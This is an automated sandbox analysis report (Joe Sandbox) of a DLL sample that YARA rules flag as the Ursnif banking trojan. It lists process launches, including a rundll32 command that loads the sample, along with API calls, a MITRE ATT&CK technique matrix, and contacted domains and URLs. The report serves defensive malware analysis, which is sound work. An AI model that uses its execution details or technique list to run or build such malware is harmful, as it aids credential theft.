                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1Jump to behavior
                    Source: loaddll32.exe, 00000000.00000002.480347908.0000000001850000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.481209381.0000000003730000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.482010646.0000000003320000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481281479.0000000003320000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                    Source: loaddll32.exe, 00000000.00000002.480347908.0000000001850000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.481209381.0000000003730000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.482010646.0000000003320000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481281479.0000000003320000.00000002.00000001.sdmpBinary or memory string: Progman
                    Source: loaddll32.exe, 00000000.00000002.480347908.0000000001850000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.481209381.0000000003730000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.482010646.0000000003320000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481281479.0000000003320000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
                    Source: loaddll32.exe, 00000000.00000002.480347908.0000000001850000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.481209381.0000000003730000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.482010646.0000000003320000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481281479.0000000003320000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
                    Source: loaddll32.exe, 00000000.00000002.480347908.0000000001850000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.481209381.0000000003730000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.482010646.0000000003320000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481281479.0000000003320000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE37689 cpuid 0_2_6DE37689
                    Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,0_2_6DDF1566
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,2_2_6DDF1566
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDF17A7 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_6DDF17A7
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDF146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6DDF146C

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000000.00000003.425497908.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.415227072.0000000000BE0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.422187658.0000000000CA0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.416030863.0000000003030000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5.3.rundll32.exe.ca8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.loaddll32.exe.6ddf0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.regsvr32.exe.6ddf0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rundll32.exe.6ddf0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.3.regsvr32.exe.3038d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.1398d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.rundll32.exe.be8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.6ddf0000.2.unpack, type: UNPACKEDPE

                    Remote Access Functionality:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000000.00000003.425497908.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.415227072.0000000000BE0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.422187658.0000000000CA0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.416030863.0000000003030000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5.3.rundll32.exe.ca8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.loaddll32.exe.6ddf0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.regsvr32.exe.6ddf0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rundll32.exe.6ddf0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.3.regsvr32.exe.3038d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.1398d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.rundll32.exe.be8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.6ddf0000.2.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsNative API1DLL Side-Loading1Process Injection12Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection12LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsSystem Information Discovery23SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 429317 Sample: racial.drc Startdate: 03/06/2021 Architecture: WINDOWS Score: 56 28 Found malware configuration 2->28 30 Yara detected  Ursnif 2->30 7 loaddll32.exe 1 2->7         started        process3 process4 9 iexplore.exe 1 76 7->9         started        11 cmd.exe 1 7->11         started        13 regsvr32.exe 7->13         started        15 rundll32.exe 7->15         started        process5 17 iexplore.exe 149 9->17         started        20 rundll32.exe 11->20         started        dnsIp6 22 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49729, 49730 FASTLYUS United States 17->22 24 geolocation.onetrust.com 104.20.185.68, 443, 49717, 49718 CLOUDFLARENETUS United States 17->24 26 8 other IPs or domains 17->26

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    No Antivirus matches

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    tls13.taboola.map.fastly.net0%VirustotalBrowse
                    img.img-taboola.com1%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
                    https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
                    https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
                    https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
                    https://onedrive.live.com;OneDrive-App0%Avira URL Cloudsafe
                    https://onedrive.live.com;Fotos0%Avira URL Cloudsafe
                    https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json0%URL Reputationsafe
                    https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json0%URL Reputationsafe
                    https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json0%URL Reputationsafe
                    https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
                    https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
                    https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
                    https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html0%URL Reputationsafe
                    https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html0%URL Reputationsafe
                    https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html0%URL Reputationsafe
                    https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
                    https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
                    https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                    http://www.wikipedia.com/0%URL Reputationsafe
                    http://www.wikipedia.com/0%URL Reputationsafe
                    http://www.wikipedia.com/0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    contextual.media.net
                    23.57.80.37
                    truefalse
                      high
                      tls13.taboola.map.fastly.net
                      151.101.1.44
                      truefalseunknown
                      hblg.media.net
                      23.57.80.37
                      truefalse
                        high
                        lg3.media.net
                        23.57.80.37
                        truefalse
                          high
                          geolocation.onetrust.com
                          104.20.185.68
                          truefalse
                            high
                            web.vortex.data.msn.com
                            unknown
                            unknownfalse
                              high
                              www.msn.com
                              unknown
                              unknownfalse
                                high
                                srtb.msn.com
                                unknown
                                unknownfalse
                                  high
                                  img.img-taboola.com
                                  unknown
                                  unknownfalseunknown
                                  cvision.media.net
                                  unknown
                                  unknownfalse
                                    high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-mede-ch[1].htm.6.drfalse
                                      high
                                      https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;de-ch[1].htm.6.drfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://www.skype.com/de/download-skype52-478955-68ddb2ab[1].js.6.drfalse
                                        high
                                        http://searchads.msn.net/.cfm?&&kp=1&{2E23CC93-C4E5-11EB-90E5-ECF4BB570DC9}.dat.4.drfalse
                                          high
                                          https://contextual.media.net/medianet.php?cid=8CU157172de-ch[1].htm.6.drfalse
                                            high
                                            https://www.msn.com/de-ch/nachrichten/coronareisende-ch[1].htm.6.drfalse
                                              high
                                              https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_headerde-ch[1].htm.6.drfalse
                                                high
                                                http://www.hotmail.msn.com/pii/ReadOutlookEmail/52-478955-68ddb2ab[1].js.6.drfalse
                                                  high
                                                  https://onedrive.live.com;OneDrive-App52-478955-68ddb2ab[1].js.6.drfalse
                                                  • Avira URL Cloud: safe
                                                  low
                                                  https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;de-ch[1].htm.6.drfalse
                                                    high
                                                    https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_nade-ch[1].htm.6.drfalse
                                                      high
                                                      https://onedrive.live.com;Fotos52-478955-68ddb2ab[1].js.6.drfalse
                                                      • Avira URL Cloud: safe
                                                      low
                                                      https://www.msn.com/de-ch/sport?ocid=StripeOCIDde-ch[1].htm.6.drfalse
                                                        high
                                                        https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692de-ch[1].htm.6.drfalse
                                                          high
                                                          https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/26-j%c3%a4hriger-mann-stirbt-nach-sturz-auf-vorplade-ch[1].htm.6.drfalse
                                                            high
                                                            https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                              high
                                                              http://www.amazon.com/msapplication.xml.4.drfalse
                                                                high
                                                                https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/eye-tracking-bei-online-pr%c3%bcfungen-keiner-%c3%de-ch[1].htm.6.drfalse
                                                                  high
                                                                  https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=152-478955-68ddb2ab[1].js.6.drfalse
                                                                    high
                                                                    https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msnde-ch[1].htm.6.drfalse
                                                                      high
                                                                      https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel52-478955-68ddb2ab[1].js.6.drfalse
                                                                        high
                                                                        http://ogp.me/ns/fb#de-ch[1].htm.6.drfalse
                                                                          high
                                                                          http://www.twitter.com/msapplication.xml5.4.drfalse
                                                                            high
                                                                            https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway52-478955-68ddb2ab[1].js.6.drfalse
                                                                              high
                                                                              https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-ss&amp;ued=httde-ch[1].htm.6.drfalse
                                                                                high
                                                                                https://cdn.cookielaw.org/vendorlist/googleData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                  high
                                                                                  https://outlook.com/de-ch[1].htm.6.drfalse
                                                                                    high
                                                                                    https://outlook.live.com/mail/deeplink/compose;Kalender52-478955-68ddb2ab[1].js.6.drfalse
                                                                                      high
                                                                                      https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg{2E23CC93-C4E5-11EB-90E5-ECF4BB570DC9}.dat.4.drfalse
                                                                                        high
                                                                                        https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002de-ch[1].htm.6.drfalse
                                                                                          high
                                                                                          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2{2E23CC93-C4E5-11EB-90E5-ECF4BB570DC9}.dat.4.drfalse
                                                                                            high
                                                                                            https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.jsoniab2Data[1].json.6.drfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn52-478955-68ddb2ab[1].js.6.drfalse
                                                                                              high
                                                                                              https://cdn.cookielaw.org/vendorlist/iabData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                high
                                                                                                https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;de-ch[1].htm.6.drfalse
                                                                                                  high
                                                                                                  https://cdn.cookielaw.org/vendorlist/iab2Data.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                    high
                                                                                                    https://onedrive.live.com/?qt=mru;Aktuelle52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                      high
                                                                                                      https://www.msn.com/de-ch/?ocid=iehp{2E23CC93-C4E5-11EB-90E5-ECF4BB570DC9}.dat.4.drfalse
                                                                                                        high
                                                                                                        https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-navde-ch[1].htm.6.drfalse
                                                                                                          high
                                                                                                          http://www.reddit.com/msapplication.xml4.4.drfalse
                                                                                                            high
                                                                                                            https://www.skype.com/de-ch[1].htm.6.drfalse
                                                                                                              high
                                                                                                              https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;tde-ch[1].htm.6.drfalse
                                                                                                                high
                                                                                                                https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;de-ch[1].htm.6.drfalse
                                                                                                                  high
                                                                                                                  https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlinkde-ch[1].htm.6.drfalse
                                                                                                                    high
                                                                                                                    https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;de-ch[1].htm.6.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://www.msn.com/de-ch/nachrichten/regionalde-ch[1].htm.6.drfalse
                                                                                                                      high
                                                                                                                      http://www.nytimes.com/msapplication.xml3.4.drfalse
                                                                                                                        high
                                                                                                                        https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;ade-ch[1].htm.6.drfalse
                                                                                                                          high
                                                                                                                          https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.htmliab2Data[1].json.6.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://onedrive.live.com/?qt=allmyphotos;Aktuelle52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                            high
                                                                                                                            https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/trotz-breiter-protestwelle-sollen-die-maag-hallen-de-ch[1].htm.6.drfalse
                                                                                                                              high
                                                                                                                              https://www.bidstack.com/privacy-policy/iab2Data[1].json.6.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://onedrive.live.com/about/en/download/52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                high
                                                                                                                                http://popup.taboola.com/germanauction[1].htm.6.drfalse
                                                                                                                                  high
                                                                                                                                  https://amzn.to/2TTxhNgde-ch[1].htm.6.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.msn.com/de-ch/news/other/junger-mann-stirbt-nach-sturz-von-einer-mauer-bei-der-eth/ar-AAde-ch[1].htm.6.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                        high
                                                                                                                                        https://client-s.gateway.messenger.live.com52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_dde-ch[1].htm.6.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.msn.com/de-ch/de-ch[1].htm.6.drfalse
                                                                                                                                              high
                                                                                                                                              https://www.msn.com/de-ch/news/other/gr%c3%bcne-fordern-regierung-soll-zeitungen-f%c3%b6rdern/ar-AAKde-ch[1].htm.6.drfalse
                                                                                                                                                high
                                                                                                                                                https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1{2E23CC93-C4E5-11EB-90E5-ECF4BB570DC9}.dat.4.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-riverde-ch[1].htm.6.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://twitter.com/de-ch[1].htm.6.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.msn.com/de-chde-ch[1].htm.6.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;mde-ch[1].htm.6.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=ch-dede-ch[1].htm.6.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://twitter.com/i/notifications;Ich52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopade-ch[1].htm.6.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.msn.com/de-ch/news/other/walt-disney-sprach-ihn-an-und-pl%c3%b6tzlich-stand-sein-leben-kde-ch[1].htm.6.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;httpde-ch[1].htm.6.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://outlook.live.com/calendar52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auauction[1].htm.6.drfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://onedrive.live.com/#qt=mru52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;apauction[1].htm.6.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.msn.com?form=MY01O4&OCID=MY01O4de-ch[1].htm.6.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://support.skype.com52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsbde-ch[1].htm.6.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=de-ch[1].htm.6.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://www.youtube.com/msapplication.xml7.4.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1{2E23CC93-C4E5-11EB-90E5-ECF4BB570DC9}.dat.4.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://ogp.me/ns#de-ch[1].htm.6.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656de-ch[1].htm.6.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://www.wikipedia.com/msapplication.xml6.4.drfalse
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;httpde-ch[1].htm.6.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utmde-ch[1].htm.6.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://www.live.com/msapplication.xml2.4.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://onedrive.live.com/?qt=mru;OneDrive-App52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.skype.com/de52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://login.skype.com/login/oauth/microsoft?client_id=73813352-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/k%c3%b6nnen-seil-oder-hochbahnen-z%c3%bcrichs-verkde-ch[1].htm.6.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/wer-bekommt-im-kanton-z%c3%bcrich-pr%c3%a4mienverbde-ch[1].htm.6.drfalse
                                                                                                                                                                                                                high

                                                                                                                                                                                                                Contacted IPs

                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                Public

                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                104.20.185.68
                                                                                                                                                                                                                geolocation.onetrust.comUnited States
                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                151.101.1.44
                                                                                                                                                                                                                tls13.taboola.map.fastly.netUnited States
                                                                                                                                                                                                                54113FASTLYUSfalse

                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                                                                                Analysis ID:429317
                                                                                                                                                                                                                Start date:03.06.2021
                                                                                                                                                                                                                Start time:20:29:30
                                                                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                                Overall analysis duration:0h 8m 10s
                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                Sample file name:racial.drc (renamed file extension from drc to dll)
                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                                Number of analysed new started processes analysed:18
                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                • HDC enabled
                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                Classification:mal56.troj.winDLL@13/121@9/2
                                                                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                                                                HDC Information:
                                                                                                                                                                                                                • Successful, ratio: 6.5% (good quality ratio 6.1%)
